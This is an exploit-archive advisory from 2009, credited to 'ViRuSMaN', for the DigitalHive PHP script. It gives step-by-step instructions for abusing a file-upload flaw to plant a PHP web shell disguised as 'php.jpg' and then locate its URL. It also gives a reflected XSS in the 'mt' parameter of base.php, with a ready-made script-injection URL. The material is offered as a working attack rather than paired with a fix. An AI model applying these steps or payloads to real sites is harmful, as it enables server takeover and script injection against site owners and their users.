[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : DigitalHive Multiple Vulnerabilities
# Published : 2009-12-14
# Author : ViRuSMaN
# Previous Title : [WS] upload Remote File Upload Vulnerability
# Next Title : Maxs AJAX File Uploader Remote File Upload Vulnerability


[-]##############################################################
|
| DigitalHive Remote File Upload Vulnerability
|
| Author : ViRuSMaN
|
| Contact : v.-m@live.com
|
| Home : Islam-Attack.CoM , HackTeach.OrG
|
| Download :http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil
[-]##############################################################
|
| Exp:
|
| 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php
|
|
| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier"
|
|
| 3-Now upload your shell in "php.jpg" format
|
|
| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell.
|
[-]#############################################################
|
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's
|
[-]#############################################################

==============================================================================
        [?] DigitalHive Multiple Vulnerabilities
==============================================================================

    [?] Script:             [ DigitalHive ]
    [?] Language:           [ PHP ]
    [?] Site page:          [ Hive est systeme permettant de creer facilement et rapidement un systeme ]
    [?] Download:           [ http://www.digitalhive.com/base.php?page=site/telechargements.php&var=dl&num=17 ]
    [?] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [?] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Sec-Attack.Com ]
    [?] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

        [?] http://server/[path]/base.php?page=membres.php&mt=[Xss Vuln]

===[ Live Demo ]===

    [?] http://server/base.php?page=membres.php&mt=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

Author: ViRuSMaN <-